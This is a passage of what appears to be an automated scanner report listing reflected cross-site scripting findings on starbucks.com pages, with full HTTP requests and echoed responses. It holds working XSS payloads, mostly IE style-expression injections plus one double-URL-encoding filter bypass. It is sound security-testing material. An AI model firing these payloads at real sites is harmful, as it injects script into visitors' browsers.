Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b07"style%3d"x%3aexpression(alert(1))"d430c70698c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67b07"style="x:expression(alert(1))"d430c70698c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/menu?67b07"style%3d"x%3aexpression(alert(1))"d430c70698c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:46 GMT
Connection: close
Content-Length: 37148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/menu?67b07"style="x:expression(alert(1))"d430c70698c=1"/>
...[SNIP]...

2.80. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82a22"style%3d"x%3aexpression(alert(1))"ae90a773c06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82a22"style="x:expression(alert(1))"ae90a773c06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/responsibility?82a22"style%3d"x%3aexpression(alert(1))"ae90a773c06=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:05 GMT
Connection: close
Content-Length: 37371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/responsibility?82a22"style="x:expression(alert(1))"ae90a773c06=1"/>
...[SNIP]...

2.81. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52686"style%3d"x%3aexpression(alert(1))"0dd78febff8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52686"style="x:expression(alert(1))"0dd78febff8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/shop?52686"style%3d"x%3aexpression(alert(1))"0dd78febff8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:47 GMT
Connection: close
Content-Length: 51738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/shop?52686"style="x:expression(alert(1))"0dd78febff8=1"/>
...[SNIP]...

2.82. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06e7"style%3d"x%3aexpression(alert(1))"79ab42fc008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f06e7"style="x:expression(alert(1))"79ab42fc008 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu?f06e7"style%3d"x%3aexpression(alert(1))"79ab42fc008=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/search?keywords=%27
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.2.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:04:51 GMT
Content-Length: 73370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?f06e7"style="x:expression(alert(1))"79ab42fc008=1"/>
...[SNIP]...

2.83. http://www.starbucks.com/menu/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfba3"style%3d"x%3aexpression(alert(1))"49bff4af7b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfba3"style="x:expression(alert(1))"49bff4af7b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /menu/?dfba3"style%3d"x%3aexpression(alert(1))"49bff4af7b5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:07 GMT
Connection: close
Content-Length: 73370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?dfba3"style="x:expression(alert(1))"49bff4af7b5=1"/>
...[SNIP]...

2.84. http://www.starbucks.com/menu/catalog/nutrition [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd71c"style%3d"x%3aexpression(alert(1))"a1cc417fc6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd71c"style="x:expression(alert(1))"a1cc417fc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/catalog/nutrition?drink=bottled-drinks&cd71c"style%3d"x%3aexpression(alert(1))"a1cc417fc6c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:57 GMT
Connection: close
Content-Length: 45151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/catalog/nutrition?drink=bottled-drinks&cd71c"style="x:expression(alert(1))"a1cc417fc6c=1"/>
...[SNIP]...

2.85. http://www.starbucks.com/menu/catalog/nutrition [wellness parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The value of the wellness request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7b93903311e was submitted in the wellness parameter. This input was echoed as b4984"><script>alert(1)</script>7b93903311e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the wellness request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /menu/catalog/nutrition?food=all&wellness=high-fiberb4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7b93903311e HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:31 GMT
Connection: close
Content-Length: 54080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="http://www.starbucks.com:80/menu/catalog/nutrition?food=all&wellness=high-fiberb4984"><script>alert(1)</script>7b93903311e&page=2">
...[SNIP]...

2.86. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload decb7"style%3d"x%3aexpression(alert(1))"f7af35945af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as decb7"style="x:expression(alert(1))"f7af35945af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks?decb7"style%3d"x%3aexpression(alert(1))"f7af35945af=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:39 GMT
Connection: close
Content-Length: 62628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks?decb7"style="x:expression(alert(1))"f7af35945af=1"/>
...[SNIP]...

2.87. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f952b"style%3d"x%3aexpression(alert(1))"627ac60126a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f952b"style="x:expression(alert(1))"627ac60126a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha?f952b"style%3d"x%3aexpression(alert(1))"627ac60126a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:36 GMT
Connection: close
Content-Length: 39912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha?f952b"style="x:expression(alert(1))"627ac60126a=1"/>
...[SNIP]...

2.88. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5154"style%3d"x%3aexpression(alert(1))"95d490ebdf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5154"style="x:expression(alert(1))"95d490ebdf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-mocha?e5154"style%3d"x%3aexpression(alert(1))"95d490ebdf8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:31 GMT
Connection: close
Content-Length: 39835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha?e5154"style="x:expression(alert(1))"95d490ebdf8=1"/>
...[SNIP]...

2.89. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a3a"style%3d"x%3aexpression(alert(1))"a035c85f5f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2a3a"style="x:expression(alert(1))"a035c85f5f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla?d2a3a"style%3d"x%3aexpression(alert(1))"a035c85f5f9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:30 GMT
Connection: close
Content-Length: 39905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla?d2a3a"style="x:expression(alert(1))"a035c85f5f9=1"/>
...[SNIP]...

2.90. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895ee"style%3d"x%3aexpression(alert(1))"e3d116c9abe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 895ee"style="x:expression(alert(1))"e3d116c9abe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy?895ee"style%3d"x%3aexpression(alert(1))"e3d116c9abe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:31 GMT
Connection: close
Content-Length: 39704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy?895ee"style="x:expression(alert(1))"e3d116c9abe=1"/>
...[SNIP]...

2.91. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe726"style%3d"x%3aexpression(alert(1))"d19a9e87e85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe726"style="x:expression(alert(1))"d19a9e87e85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy?fe726"style%3d"x%3aexpression(alert(1))"d19a9e87e85=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:38 GMT
Connection: close
Content-Length: 39838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy?fe726"style="x:expression(alert(1))"d19a9e87e85=1"/>
...[SNIP]...

2.92. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-frappuccino

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76702"style%3d"x%3aexpression(alert(1))"b4ae84575bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76702"style="x:expression(alert(1))"b4ae84575bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/coffee-frappuccino?76702"style%3d"x%3aexpression(alert(1))"b4ae84575bd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:51 GMT
Connection: close
Content-Length: 39815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
